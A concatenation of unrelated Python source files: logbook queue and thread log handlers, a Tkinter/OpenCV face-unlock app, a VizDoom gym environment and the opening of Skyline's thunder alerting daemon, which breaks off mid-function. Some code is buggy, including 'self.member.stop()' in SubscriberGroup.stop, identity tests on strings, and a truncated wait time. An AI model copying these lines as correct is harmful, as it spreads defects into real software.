the util fails.
"""
import logging
import multiprocessing
logging.multiprocessing = multiprocessing
class MultiProcessingHandler(Handler):
"""Implements a handler that dispatches over a queue to a different
process. It is connected to a subscriber with a
:class:`multiprocessing.Queue`::
from multiprocessing import Queue
from logbook.queues import MultiProcessingHandler
queue = Queue(-1)
handler = MultiProcessingHandler(queue)
"""
def __init__(self, queue, level=NOTSET, filter=None, bubble=False):
Handler.__init__(self, level, filter, bubble)
self.queue = queue
_fix_261_mplog()
def emit(self, record):
self.queue.put_nowait(record.to_dict(json_safe=True))
class MultiProcessingSubscriber(SubscriberBase):
"""Receives log records from the given multiprocessing queue and
dispatches them to the active handler setup. Make sure to use the same
queue for both handler and subscriber. Idaelly the queue is set
up with maximum size (``-1``)::
from multiprocessing import Queue
queue = Queue(-1)
It can be used to receive log records from a queue::
subscriber = MultiProcessingSubscriber(queue)
record = subscriber.recv()
But it can also be used to receive and dispatch these in one go::
with target_handler:
subscriber = MultiProcessingSubscriber(queue)
subscriber.dispatch_forever()
This will take all the log records from that queue and dispatch them
over to `target_handler`. If you want you can also do that in the
background::
subscriber = MultiProcessingSubscriber(queue)
controller = subscriber.dispatch_in_background(target_handler)
The controller returned can be used to shut down the background
thread::
controller.stop()
If no queue is provided the subscriber will create one. This one can the
be used by handlers::
subscriber = MultiProcessingSubscriber()
handler = MultiProcessingHandler(subscriber.queue)
"""
def __init__(self, queue=None):
if queue is None:
from multiprocessing import Queue
queue = Queue(-1)
self.queue = queue
_fix_261_mplog()
def recv(self, timeout=None):
if timeout is None:
rv = self.queue.get()
else:
try:
rv = self.queue.get(block=True, timeout=timeout)
except Empty:
return None
return LogRecord.from_dict(rv)
class ExecnetChannelHandler(Handler):
"""Implements a handler that dispatches over a execnet channel
to a different process.
"""
def __init__(self, channel, level=NOTSET, filter=None, bubble=False):
Handler.__init__(self, level, filter, bubble)
self.channel = channel
def emit(self, record):
self.channel.send(record.to_dict(json_safe=True))
class ExecnetChannelSubscriber(SubscriberBase):
"""subscribes to a execnet channel"""
def __init__(self, channel):
self.channel = channel
def recv(self, timeout=None):
try:
rv = self.channel.receive(timeout=timeout)
except self.channel.RemoteError:
# XXX: handle
return None
except (self.channel.TimeoutError, EOFError):
return None
else:
return LogRecord.from_dict(rv)
class TWHThreadController(object):
"""A very basic thread controller that pulls things in from a
queue and sends it to a handler. Both queue and handler are
taken from the passed :class:`ThreadedWrapperHandler`.
"""
_sentinel = object()
def __init__(self, wrapper_handler):
self.wrapper_handler = wrapper_handler
self.running = False
self._thread = None
def start(self):
"""Starts the task thread."""
self.running = True
self._thread = Thread(target=self._target)
self._thread.setDaemon(True)
self._thread.start()
def stop(self):
"""Stops the task thread."""
if self.running:
self.wrapper_handler.queue.put_nowait(self._sentinel)
self._thread.join()
self._thread = None
def _target(self):
while 1:
record = self.wrapper_handler.queue.get()
if record is self._sentinel:
self.running = False
break
self.wrapper_handler.handler.handle(record)
class ThreadedWrapperHandler(WrapperHandler):
"""This handled uses a single background thread to dispatch log records
to a specific other handler using an internal queue. The idea is that if
you are using a handler that requires some time to hand off the log records
(such as the mail handler) and would block your request, you can let
Logbook do that in a background thread.
The threaded wrapper handler will automatically adopt the methods and
properties of the wrapped handler. All the values will be reflected:
>>> twh = ThreadedWrapperHandler(TestHandler())
>>> from logbook import WARNING
>>> twh.level_name = 'WARNING'
>>> twh.handler.level_name
'WARNING'
"""
_direct_attrs = frozenset(['handler', 'queue', 'controller'])
def __init__(self, handler, maxsize=0):
WrapperHandler.__init__(self, handler)
self.queue = ThreadQueue(maxsize)
self.controller = TWHThreadController(self)
self.controller.start()
def close(self):
self.controller.stop()
self.handler.close()
def emit(self, record):
try:
self.queue.put_nowait(record)
except Full:
# silently drop
pass
class GroupMember(ThreadController):
def __init__(self, subscriber, queue):
ThreadController.__init__(self, subscriber, None)
self.queue = queue
def _target(self):
if self.setup is not None:
self.setup.push_thread()
try:
while self.running:
record = self.subscriber.recv()
if record:
try:
self.queue.put(record, timeout=0.05)
except Full:
pass
finally:
if self.setup is not None:
self.setup.pop_thread()
class SubscriberGroup(SubscriberBase):
"""This is a subscriber which represents a group of subscribers.
This is helpful if you are writing a server-like application which has
"slaves". This way a user is easily able to view every log record which
happened somewhere in the entire system without having to check every
single slave::
subscribers = SubscriberGroup([
MultiProcessingSubscriber(queue),
ZeroMQSubscriber('tcp://127.0.0.1:5000')
])
with target_handler:
subscribers.dispatch_forever()
"""
def __init__(self, subscribers=None, queue_limit=10):
self.members = []
self.queue = ThreadQueue(queue_limit)
for subscriber in subscribers or []:
self.add(subscriber)
def add(self, subscriber):
"""Adds the given `subscriber` to the group."""
member = GroupMember(subscriber, self.queue)
member.start()
self.members.append(member)
def recv(self, timeout=None):
try:
return self.queue.get(timeout=timeout)
except Empty:
return
def stop(self):
"""Stops the group from internally recieving any more messages, once the
internal queue is exhausted :meth:`recv` will always return `None`.
"""
for member in self.members:
self.member.stop()
|
SECURITY.py | from tkinter import *
from PIL import Image, ImageTk
import cv2
import numpy as np
import os
from os.path import isfile, join
from threading import Thread
from userHandler import UserData
import FACE_UNLOCKER as FU
background, textColor = 'white', 'black'
face_classifier = cv2.CascadeClassifier('Cascade/haarcascade_frontalface_default.xml')
if os.path.exists('userData')==False:
os.mkdir('userData')
if os.path.exists('userData/faceData')==False:
os.mkdir('userData/faceData')
###### ROOT1 ########
def startLogin():
try:
result = FU.startDetecting()
if result:
user = UserData()
user.extractData()
userName = user.getName().split()[0]
welcLbl['text'] = 'Hi '+userName+',\nWelcome to the world of\nScience & Technology'
Lbl['text'] = 'Hi '+userName+',\nWelcome to the world of\nScience & Technology'
loginStatus['text'] = 'UNLOCKED'
loginStatus['fg'] = 'green'
faceStatus['text']='(Logged In)'
raise_frame(root3)
else:
print('Error Occurred')
except Exception as e:
print(e)
####### ROOT2 ########
def trainFace():
data_path = 'userData/faceData/'
onlyfiles = [f for f in os.listdir(data_path) if isfile(join(data_path, f))]
Training_data = []
Labels = []
for i, files in enumerate(onlyfiles):
image_path = data_path + onlyfiles[i]
images = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)
Training_data.append(np.asarray(images, dtype=np.uint8))
Labels.append(i)
Labels = np.asarray(Labels, dtype=np.int32)
model = cv2.face.LBPHFaceRecognizer_create()
model.train(np.asarray(Training_data), np.asarray(Labels))
print('Model Trained Successfully !!!')
model.save('userData/trainer.yml')
print('Model Saved !!!')
def face_extractor(img):
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_classifier.detectMultiScale(gray, 1.3, 5)
if faces is():
return None
for (x, y, w, h) in faces:
cropped_face = img[y:y+h, x:x+w]
return cropped_face
cap = cv2.VideoCapture(0)
count = 0
def startCapturing():
global count
ret, frame = cap.read()
if face_extractor(frame) is not None:
count += 1
face = cv2.resize(face_extractor(frame), (200, 200))
face = cv2.cvtColor(face, cv2.COLOR_BGR2GRAY)
file_name_path = 'userData/faceData/img' + str(count) + '.png'
cv2.imwrite(file_name_path, face)
print(count)
progressLbl['text'] = 'Progress ' + str(count) + '%'
cv2.putText(face, str(count), (50, 50), cv2.FONT_HERSHEY_COMPLEX, 1, (0,255,0), 2)
else:
progressLbl['text'] = 'Face Not Clear'
if count==100:
lmain['image'] = defaultImg2
statusLbl['text'] = '(Face added successfully)'
cap.release()
cv2.destroyAllWindows()
trainFace()
return
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)
frame = cv2.flip(frame, 1)
img = Image.fromarray(frame)
imgtk = ImageTk.PhotoImage(image=img)
lmain.imgtk = imgtk
lmain.configure(image=imgtk)
lmain.after(10, startCapturing)
def Add_Face():
user = nameField.get()
gender = r.get()
if user is not '' and gender!=0:
startCapturing()
statusLbl['text'] = ''
gen = 'Male'
if gender==2: gen = 'Female'
u = UserData()
u.updateData(user, gen)
else:
statusLbl['text'] = '(Please fill the details)'
def raise_frame(frame):
frame.tkraise()
if __name__ == '__main__':
root = Tk()
root.title('ASSISTANT')
root.geometry('350x600')
root.configure(bg=background)
root1 = Frame(root, bg=background)
root2 = Frame(root, bg=background)
root3 = Frame(root, bg=background)
for f in (root1, root2, root3):
f.grid(row=0, column=0, sticky='news')
################################
######## MAIN SCREEN #########
################################
image1 = Image.open('images/menu.jpg')
defaultImg1 = ImageTk.PhotoImage(image1)
dataFrame1 = Frame(root1, bd=10, bg=background)
dataFrame1.pack()
logo = Label(dataFrame1, width=300, height=250, image=defaultImg1)
logo.pack(padx=10, pady=10)
#welcome label
welcLbl = Label(root1, text='Hi there,\nWelcome to the world of\nScience & Technology', font=('Arial', 15), fg=textColor, bg=background)
welcLbl.pack(padx=10, pady=20)
#add face
loginStatus = Label(root1, text='LOCKED', font=('Arial Bold', 15), bg=background, fg='red')
loginStatus.pack(pady=(50,0))
if os.path.exists('userData/trainer.yml')==False:
loginStatus['text'] = 'Your Face is not registered'
addFace = Button(root1, text='Add Face', font=('Arial', 12), bg='blue', fg='white', command=lambda:raise_frame(root2))
addFace.pack(ipadx=10)
else:
Thread(target=startLogin).start()
#status of add face
faceStatus = Label(root1, text='(Face Not Detected)', font=('Arial 10'), fg=textColor, bg=background)
faceStatus.pack(pady=5)
##################################
######## FACE ADD SCREEN #######
##################################
image2 = Image.open('images/defaultFace2.jpg')
defaultImg2 = ImageTk.PhotoImage(image2)
dataFrame2 = Frame(root2, bd=10, bg=background)
dataFrame2.pack(fill=X)
lmain = Label(dataFrame2, width=300, height=250, image=defaultImg2)
lmain.pack(padx=10, pady=10)
#Details
detailFrame2 = Frame(root2, bd=10, bg=background)
detailFrame2.pack(fill=X)
userFrame2 = Frame(detailFrame2, bd=10, width=300, height=250, relief=FLAT, bg=background)
userFrame2.pack(padx=10, pady=10)
#progress
progressLbl = Label(dataFrame2, text='', font=('Arial Bold', 10), bg=background, fg=textColor)
progressLbl.place(x=120, y=265)
#name
nameLbl = Label(userFrame2, text='Name', font=('Arial Bold', 12), fg=textColor, bg=background)
nameLbl.place(x=10,y=10)
nameField = Entry(userFrame2, bd=5, font=('Arial 10'), width=25)
nameField.focus()
nameField.place(x=80,y=10)
genLbl = Label(userFrame2, text='Gender', font=('Arial Bold', 12), fg=textColor, bg=background)
genLbl.place(x=10,y=50)
r = IntVar()
genMale = Radiobutton(userFrame2, text='Male' ,font=('Arial 10'), value=1, bg=background, fg=textColor, variable=r)
genMale.place(x=80,y=50)
genFemale = Radiobutton(userFrame2, text='Female' ,font=('Arial 10'), value=2, bg=background, fg=textColor, variable=r)
genFemale.place(x=180,y=50)
#agreement
agree = Checkbutton(userFrame2, text='I agree to use my face for Security purpose', fg=textColor, bg=background)
agree.place(x=30, y=100)
#add face
addBtn = Button(userFrame2, text='Add Face', font=('Arial Bold', 12), bg='green', fg='white', command=Add_Face)
addBtn.place(x=100, y=150)
#status of add face
statusLbl = Label(userFrame2, text='', font=('Arial 10'), fg=textColor, bg=background)
statusLbl.place(x=60, y=190)
###########################
####### CHAT SCREEN #######
###########################
image3 = Image.open('images/back.jpg')
defaultImg3 = ImageTk.PhotoImage(image3)
dataFrame3 = Frame(root3, bd=10, bg=background)
dataFrame3.pack()
img = Label(dataFrame3, width=300, height=250, image=defaultImg3)
img.pack(padx=10, pady=10)
#welcome label
Lbl = Label(root3, text="Hi, I'm your personal assistant", font=('Arial', 15), fg=textColor, bg=background)
Lbl.pack(padx=10, pady=20)
raise_frame(root1)
root.mainloop()
|
doom_gym.py | import copy
import os
import random
import re
import time
from os.path import join
from threading import Thread
import cv2
import gym
import numpy as np
from filelock import FileLock, Timeout
from gym.utils import seeding
from vizdoom.vizdoom import ScreenResolution, DoomGame, Mode, AutomapMode
from algorithms.utils.spaces.discretized import Discretized
from utils.utils import log, project_tmp_dir
def doom_lock_file(max_parallel):
"""
Doom instances tend to have problems starting when a lot of them are initialized in parallel.
This is not a problem during normal execution once the envs are initialized.
The "sweet spot" for the number of envs that can be initialized in parallel is about 5-10.
Here we use file locking mechanism to ensure that only a limited amount of envs are being initialized at the same
time.
This tends to be more of a problem for multiplayer envs.
This also has an advantage of working across completely independent process groups, e.g. different experiments.
"""
lock_filename = f'doom_{random.randrange(0, max_parallel):03d}.lockfile'
tmp_dir = project_tmp_dir()
lock_path = join(tmp_dir, lock_filename)
return lock_path
def key_to_action_default(key):
"""
MOVE_FORWARD
MOVE_BACKWARD
MOVE_RIGHT
MOVE_LEFT
SELECT_WEAPON1
SELECT_WEAPON2
SELECT_WEAPON3
SELECT_WEAPON4
SELECT_WEAPON5
SELECT_WEAPON6
SELECT_WEAPON7
ATTACK
SPEED
TURN_LEFT_RIGHT_DELTA
"""
from pynput.keyboard import Key
# health gathering
action_table = {
Key.left: 0,
Key.right: 1,
Key.up: 2,
Key.down: 3,
}
# action_table = {
# Key.up: 0,
# Key.down: 1,
# Key.alt: 6,
# Key.ctrl: 11,
# Key.shift: 12,
# Key.space: 13,
# Key.right: 'turn_right',
# Key.left: 'turn_left',
# }
return action_table.get(key, None)
class VizdoomEnv(gym.Env):
def __init__(self,
action_space,
config_file,
coord_limits=None,
max_histogram_length=200,
show_automap=False,
skip_frames=1,
async_mode=False,
record_to=None):
self.initialized = False
# essential game data
self.game = None
self.state = None
self.curr_seed = 0
self.rng = None
self.skip_frames = skip_frames
self.async_mode = async_mode
# optional - for topdown view rendering and visitation heatmaps
self.show_automap = show_automap
self.coord_limits = coord_limits
# can be adjusted after the environment is created (but before any reset() call) via observation space wrapper
self.screen_w, self.screen_h, self.channels = 640, 480, 3
self.screen_resolution = ScreenResolution.RES_640X480
self.calc_observation_space()
self.black_screen = None
# provided as a part of environment definition, since these depend on the scenario and
# can be quite complex multi-discrete spaces
self.action_space = action_space
self.composite_action_space = hasattr(self.action_space, 'spaces')
self.delta_actions_scaling_factor = 7.5
scenarios_dir = join(os.path.dirname(__file__), 'scenarios')
self.config_path = join(scenarios_dir, config_file)
self.variable_indices = self._parse_variable_indices(self.config_path)
# only created if we call render() method
self.viewer = None
# record full episodes using VizDoom recording functionality
self.record_to = record_to
self.is_multiplayer = False # overridden in derived classes
# (optional) histogram to track positional coverage
# do not pass coord_limits if you don't need this, to avoid extra calculation
self.max_histogram_length = max_histogram_length
self.current_histogram, self.previous_histogram = None, None
if self.coord_limits:
x = (self.coord_limits[2] - self.coord_limits[0])
y = (self.coord_limits[3] - self.coord_limits[1])
if x > y:
len_x = self.max_histogram_length
len_y = int((y / x) * self.max_histogram_length)
else:
len_x = int((x / y) * self.max_histogram_length)
len_y = self.max_histogram_length
self.current_histogram = np.zeros((len_x, len_y), dtype=np.int32)
self.previous_histogram = np.zeros_like(self.current_histogram)
# helpers for human play with pynput keyboard input
self._terminate = False
self._current_actions = []
self._actions_flattened = None
self._prev_info = None
self._last_episode_info = None
self._num_episodes = 0
self.mode = 'algo'
self.seed()
def seed(self, seed=None):
self.curr_seed = seeding.hash_seed(seed, max_bytes=4)
self.rng, _ = seeding.np_random(seed=self.curr_seed)
return [self.curr_seed, self.rng]
def calc_observation_space(self):
self.observation_space = gym.spaces.Box(0, 255, (self.screen_h, self.screen_w, self.channels), dtype=np.uint8)
def _set_game_mode(self, mode):
if mode == 'replay':
self.game.set_mode(Mode.PLAYER)
else:
if self.async_mode:
log.info('Starting in async mode! Use this only for testing, otherwise PLAYER mode is much faster')
self.game.set_mode(Mode.ASYNC_PLAYER)
else:
self.game.set_mode(Mode.PLAYER)
def _create_doom_game(self, mode):
self.game = DoomGame()
self.game.load_config(self.config_path)
self.game.set_screen_resolution(self.screen_resolution)
self.game.set_seed(self.rng.randint(0, 2**32 - 1))
if mode == 'algo':
self.game.set_window_visible(False)
elif mode == 'human' or mode == 'replay':
self.game.add_game_args('+freelook 1')
self.game.set_window_visible(True)
else:
raise Exception('Unsupported mode')
self._set_game_mode(mode)
def _game_init(self, with_locking=True, max_parallel=10):
lock_file = lock = None
if with_locking:
lock_file = doom_lock_file(max_parallel)
lock = FileLock(lock_file)
init_attempt = 0
while True:
init_attempt += 1
try:
if with_locking:
with lock.acquire(timeout=20):
self.game.init()
else:
self.game.init()
break
except Timeout:
if with_locking:
log.debug(
'Another process currently holds the lock %s, attempt: %d', lock_file, init_attempt,
)
except Exception as exc:
log.warning('VizDoom game.init() threw an exception %r. Terminate process...', exc)
from envs.env_utils import EnvCriticalError
raise EnvCriticalError()
def initialize(self):
self._create_doom_game(self.mode)
# (optional) top-down view provided by the game engine
if self.show_automap:
self.game.set_automap_buffer_enabled(True)
self.game.set_automap_mode(AutomapMode.OBJECTS)
self.game.set_automap_rotate(False)
self.game.set_automap_render_textures(False)
# self.game.add_game_args("+am_restorecolors")
# self.game.add_game_args("+am_followplayer 1")
background_color = 'ffffff'
self.game.add_game_args('+viz_am_center 1')
self.game.add_game_args('+am_backcolor ' + background_color)
self.game.add_game_args('+am_tswallcolor dddddd')
# self.game.add_game_args("+am_showthingsprites 0")
self.game.add_game_args('+am_yourcolor ' + background_color)
self.game.add_game_args('+am_cheat 0')
self.game.add_game_args('+am_thingcolor 0000ff') # player color
self.game.add_game_args('+am_thingcolor_item 00ff00')
# self.game.add_game_args("+am_thingcolor_citem 00ff00")
self._game_init()
self.initialized = True
def _ensure_initialized(self):
if not self.initialized:
self.initialize()
@staticmethod
def _parse_variable_indices(config):
with open(config, 'r') as config_file:
lines = config_file.readlines()
lines = [l.strip() for l in lines]
variable_indices = {}
for line in lines:
if line.startswith('#'):
continue # comment
variables_syntax = r'available_game_variables[\s]*=[\s]*\{(.*)\}'
match = re.match(variables_syntax, line)
if match is not None:
variables_str = match.groups()[0]
variables_str = variables_str.strip()
variables = variables_str.split(' ')
for i, variable in enumerate(variables):
variable_indices[variable] = i
break
return variable_indices
def _black_screen(self):
if self.black_screen is None:
self.black_screen = np.zeros(self.observation_space.shape, dtype=np.uint8)
return self.black_screen
def _game_variables_dict(self, state):
game_variables = state.game_variables
variables = {}
for variable, idx in self.variable_indices.items():
variables[variable] = game_variables[idx]
return variables
def demo_path(self, episode_idx):
demo_name = f'e{episode_idx:03d}.lmp'
demo_path = join(self.record_to, demo_name)
demo_path = os.path.normpath(demo_path)
return demo_path
def reset(self):
self._ensure_initialized()
if self.record_to is not None and not self.is_multiplayer:
# does not work in multiplayer (uses different mechanism)
if not os.path.exists(self.record_to):
os.makedirs(self.record_to)
demo_path = self.demo_path(self._num_episodes)
log.warning('Recording episode demo to %s', demo_path)
self.game.new_episode(demo_path)
else:
if self._num_episodes > 0:
# no demo recording (default)
self.game.new_episode()
self.state = self.game.get_state()
img = None
try:
img = self.state.screen_buffer
except AttributeError:
# sometimes Doom does not return screen buffer at all??? Rare bug
pass
if img is None:
log.error('Game returned None screen buffer! This is not supposed to happen!')
img = self._black_screen()
# Swap current and previous histogram
if self.current_histogram is not None and self.previous_histogram is not None:
swap = self.current_histogram
self.current_histogram = self.previous_histogram
self.previous_histogram = swap
self.current_histogram.fill(0)
self._actions_flattened = None
self._last_episode_info = copy.deepcopy(self._prev_info)
self._prev_info = None
self._num_episodes += 1
return np.transpose(img, (1, 2, 0))
def _convert_actions(self, actions):
"""Convert actions from gym action space to the action space expected by Doom game."""
if self.composite_action_space:
# composite action space with multiple subspaces
spaces = self.action_space.spaces
else:
# simple action space, e.g. Discrete. We still treat it like composite of length 1
spaces = (self.action_space, )
actions = (actions, )
actions_flattened = []
for i, action in enumerate(actions):
if isinstance(spaces[i], Discretized):
# discretized continuous action
# check discretized first because it's a subclass of gym.spaces.Discrete
# the order of if clauses here matters! DON'T CHANGE THE ORDER OF IFS!
continuous_action = spaces[i].to_continuous(action)
actions_flattened.append(continuous_action)
elif isinstance(spaces[i], gym.spaces.Discrete):
# standard discrete action
num_non_idle_actions = spaces[i].n - 1
action_one_hot = np.zeros(num_non_idle_actions, dtype=np.uint8)
if action > 0:
action_one_hot[action - 1] = 1 # 0th action in each subspace is a no-op
actions_flattened.extend(action_one_hot)
elif isinstance(spaces[i], gym.spaces.Box):
# continuous action
actions_flattened.extend(list(action * self.delta_actions_scaling_factor))
else:
raise NotImplementedError(f'Action subspace type {type(spaces[i])} is not supported!')
return actions_flattened
def _vizdoom_variables_bug_workaround(self, info, done):
"""Some variables don't get reset to zero on game.new_episode(). This fixes it (also check overflow?)."""
if done and 'DAMAGECOUNT' in info:
log.info('DAMAGECOUNT value on done: %r', info.get('DAMAGECOUNT'))
if self._last_episode_info is not None:
bugged_vars = ['DEATHCOUNT', 'HITCOUNT', 'DAMAGECOUNT']
for v in bugged_vars:
if v in info:
info[v] -= self._last_episode_info.get(v, 0)
def _process_game_step(self, state, done, info):
if not done:
observation = np.transpose(state.screen_buffer, (1, 2, 0))
game_variables = self._game_variables_dict(state)
info.update(self.get_info(game_variables))
self._update_histogram(info)
self._prev_info = copy.deepcopy(info)
else:
observation = self._black_screen()
# when done=True Doom does not allow us to call get_info, so we provide info from the last frame
info.update(self._prev_info)
self._vizdoom_variables_bug_workaround(info, done)
return observation, done, info
def step(self, actions):
"""
Action is either a single value (discrete, one-hot), or a tuple with an action for each of the
discrete action subspaces.
"""
if self._actions_flattened is not None:
# provided externally, e.g. via human play
actions_flattened = self._actions_flattened
self._actions_flattened = None
else:
actions_flattened = self._convert_actions(actions)
default_info = {'num_frames': self.skip_frames}
reward = self.game.make_action(actions_flattened, self.skip_frames)
state = self.game.get_state()
done = self.game.is_episode_finished()
observation, done, info = self._process_game_step(state, done, default_info)
return observation, reward, done, info
def render(self, mode='human'):
try:
img = self.game.get_state().screen_buffer
img = np.transpose(img, [1, 2, 0])
if mode == 'rgb_array':
return img
h, w = img.shape[:2]
render_w = 1280
if w < render_w:
render_h = int(render_w * h / w)
img = cv2.resize(img, (render_w, render_h))
if self.viewer is None:
from gym.envs.classic_control import rendering
self.viewer = rendering.SimpleImageViewer(maxwidth=render_w)
self.viewer.imshow(img)
return img
except AttributeError:
return None
def close(self):
try:
if self.game is not None:
self.game.close()
except RuntimeError as exc:
log.warning('Runtime error in VizDoom game close(): %r', exc)
if self.viewer is not None:
self.viewer.close()
def get_info(self, variables=None):
if variables is None:
variables = self._game_variables_dict(self.game.get_state())
info_dict = {'pos': self.get_positions(variables)}
info_dict.update(variables)
return info_dict
def get_info_all(self, variables=None):
if variables is None:
variables = self._game_variables_dict(self.game.get_state())
info = self.get_info(variables)
if self.previous_histogram is not None:
info['previous_histogram'] = self.previous_histogram
return info
def get_positions(self, variables):
return self._get_positions(variables)
@staticmethod
def _get_positions(variables):
have_coord_data = True
required_vars = ['POSITION_X', 'POSITION_Y', 'ANGLE']
for required_var in required_vars:
if required_var not in variables:
have_coord_data = False
break
x = y = a = np.nan
if have_coord_data:
x = variables['POSITION_X']
y = variables['POSITION_Y']
a = variables['ANGLE']
return {'agent_x': x, 'agent_y': y, 'agent_a': a}
def get_automap_buffer(self):
if self.game.is_episode_finished():
return None
state = self.game.get_state()
map_ = state.automap_buffer
map_ = np.swapaxes(map_, 0, 2)
map_ = np.swapaxes(map_, 0, 1)
return map_
def _update_histogram(self, info, eps=1e-8):
if self.current_histogram is None:
return
agent_x, agent_y = info['pos']['agent_x'], info['pos']['agent_y']
# Get agent coordinates normalized to [0, 1]
dx = (agent_x - self.coord_limits[0]) / (self.coord_limits[2] - self.coord_limits[0])
dy = (agent_y - self.coord_limits[1]) / (self.coord_limits[3] - self.coord_limits[1])
# Rescale coordinates to histogram dimensions
# Subtract eps to exclude upper bound of dx, dy
dx = int((dx - eps) * self.current_histogram.shape[0])
dy = int((dy - eps) * self.current_histogram.shape[1])
self.current_histogram[dx, dy] += 1
def _key_to_action(self, key):
if hasattr(self.action_space, 'key_to_action'):
return self.action_space.key_to_action(key)
else:
return key_to_action_default(key)
def _keyboard_on_press(self, key):
from pynput.keyboard import Key
if key == Key.esc:
self._terminate = True
return False
action = self._key_to_action(key)
if action is not None:
if action not in self._current_actions:
self._current_actions.append(action)
def _keyboard_on_release(self, key):
action = self._key_to_action(key)
if action is not None:
if action in self._current_actions:
self._current_actions.remove(action)
# noinspection PyProtectedMember
@staticmethod
def play_human_mode(env, skip_frames=1, num_episodes=3, num_actions=None):
from pynput.keyboard import Listener
doom = env.unwrapped
doom.skip_frames = 1 # handled by this script separately
# noinspection PyProtectedMember
def start_listener():
with Listener(on_press=doom._keyboard_on_press, on_release=doom._keyboard_on_release) as listener:
listener.join()
listener_thread = Thread(target=start_listener)
listener_thread.start()
for episode in range(num_episodes):
doom.mode = 'human'
env.reset()
last_render_time = time.time()
time_between_frames = 1.0 / 35.0
total_rew = 0.0
while not doom.game.is_episode_finished() and not doom._terminate:
num_actions = 14 if num_actions is None else num_actions
turn_delta_action_idx = num_actions - 1
actions = [0] * num_actions
for action in doom._current_actions:
if isinstance(action, int):
actions[action] = 1 # 1 for buttons currently pressed, 0 otherwise
else:
if action == 'turn_left':
actions[turn_delta_action_idx] = -doom.delta_actions_scaling_factor
elif action == 'turn_right':
actions[turn_delta_action_idx] = doom.delta_actions_scaling_factor
for frame in range(skip_frames):
doom._actions_flattened = actions
_, rew, _, _ = env.step(actions)
new_total_rew = total_rew + rew
if new_total_rew != total_rew:
log.info('Reward: %.3f, total: %.3f', rew, new_total_rew)
total_rew = new_total_rew
state = doom.game.get_state()
verbose = True
if state is not None and verbose:
info = doom.get_info()
print(
'Health:', info['HEALTH'],
# 'Weapon:', info['SELECTED_WEAPON'],
# 'ready:', info['ATTACK_READY'],
# 'ammo:', info['SELECTED_WEAPON_AMMO'],
# 'pc:', info['PLAYER_COUNT'],
# 'dmg:', info['DAMAGECOUNT'],
)
time_since_last_render = time.time() - last_render_time
time_wait = time_between_frames - time_since_last_render
if doom.show_automap and state.automap_buffer is not None:
map_ = state.automap_buffer
map_ = np.swapaxes(map_, 0, 2)
map_ = np.swapaxes(map_, 0, 1)
cv2.imshow('ViZDoom Automap Buffer', map_)
if time_wait > 0:
cv2.waitKey(int(time_wait) * 1000)
else:
if time_wait > 0:
time.sleep(time_wait)
last_render_time = time.time()
if doom.show_automap:
cv2.destroyAllWindows()
log.debug('Press ESC to exit...')
listener_thread.join()
# noinspection PyProtectedMember
@staticmethod
def replay(env, rec_path):
doom = env.unwrapped
doom.mode = 'replay'
doom._ensure_initialized()
doom.game.replay_episode(rec_path)
episode_reward = 0
start = time.time()
while not doom.game.is_episode_finished():
doom.game.advance_action()
r = doom.game.get_last_reward()
episode_reward += r
log.info('Episode reward: %.3f, time so far: %.1f s', episode_reward, time.time() - start)
log.info('Finishing replay')
doom.close()
|
thunder.py | import logging
import traceback
from time import time, sleep
from threading import Thread
from multiprocessing import Process
import os
from os import kill, getpid
import os.path
from ast import literal_eval
import settings
from skyline_functions import (
mkdir_p, get_redis_conn, get_redis_conn_decoded, send_graphite_metric,
write_data_to_file)
from thunder_alerters import thunder_alert
from functions.redis.update_set import update_redis_set
from functions.filesystem.remove_file import remove_file
from functions.thunder.check_thunder_failover_key import check_thunder_failover_key
from functions.thunder.alert_on_stale_metrics import alert_on_stale_metrics
from functions.thunder.alert_on_no_data import alert_on_no_data
skyline_app = 'thunder'
skyline_app_logger = '%sLog' % skyline_app
logger = logging.getLogger(skyline_app_logger)
skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app)
skyline_app_loglock = '%s.lock' % skyline_app_logfile
skyline_app_logwait = '%s.wait' % skyline_app_logfile
this_host = str(os.uname()[1])
thunder_redis_set = 'thunder.events'
thunder_done_redis_set = 'thunder.events.done'
try:
SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
except:
SERVER_METRIC_PATH = ''
# The required THUNDER directories which are failed over to and
# used in the event that Redis is down
THUNDER_EVENTS_DIR = '%s/thunder/events' % settings.SKYLINE_TMP_DIR
THUNDER_KEYS_DIR = '%s/thunder/keys' % settings.SKYLINE_TMP_DIR
skyline_app_graphite_namespace = 'skyline.%s%s' % (skyline_app, SERVER_METRIC_PATH)
LOCAL_DEBUG = False
class Thunder(Thread):
"""
The Thunder class which controls the thunder thread and spawned
processes. Thunder is ONLY for alerting on Skyline operations.
Thunder checks on the other hand are carried out by analyzer/metrics_manager
and other Skyline apps, which send events to thunder.
thunder/rolling carries out internal and external checks and sends any events
to thunder.
"""
def __init__(self, parent_pid):
"""
Initialize the Thunder
Create the :obj:`self.redis_conn` connection
Create the :obj:`self.redis_conn_decoded` connection
"""
super(Thunder, self).__init__()
self.redis_conn = get_redis_conn(skyline_app)
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
self.daemon = True
self.parent_pid = parent_pid
self.current_pid = getpid()
def check_if_parent_is_alive(self):
"""
Self explanatory
"""
try:
kill(self.current_pid, 0)
kill(self.parent_pid, 0)
except:
logger.warn('warning :: parent or current process dead')
exit(0)
def spin_thunder_process(self, i, validated_event_details, redis_item, event_file):
"""
Roll some thunder.
:param i: python process id
:return: anomalous
:rtype: boolean
"""
def create_alert_cache_key(cache_key, expiry, timestamp):
try:
set_alert_cache_key = self.redis_conn.setex(cache_key, expiry, timestamp)
if set_alert_cache_key:
logger.info('set Redis key %s with %s TTL' % (
cache_key, str(expiry)))
except Exception as e:
logger.error('error :: set_alert_cache_key failed setting key - %s - %s' % (
cache_key, e))
# Add a key file
thunder_keys_file = '%s/%s' % (THUNDER_KEYS_DIR, cache_key)
thunder_keys_file_data = {'timestamp': timestamp, 'expiry': expiry}
try:
write_data_to_file(
skyline_app, thunder_keys_file, 'w',
str(thunder_keys_file_data))
logger.info('added Redis failover thunder_keys_file %s' % (thunder_keys_file))
except Exception as e:
logger.error('error :: failed to add Redis failover thunder_keys_file - %s - %s' % (thunder_keys_file, e))
def remove_event(redis_item, event_file):
if redis_item:
# Delete the item from the Redis set
try:
removed_item = update_redis_set(
skyline_app, thunder_redis_set, redis_item,
'remove', log=True)
if removed_item:
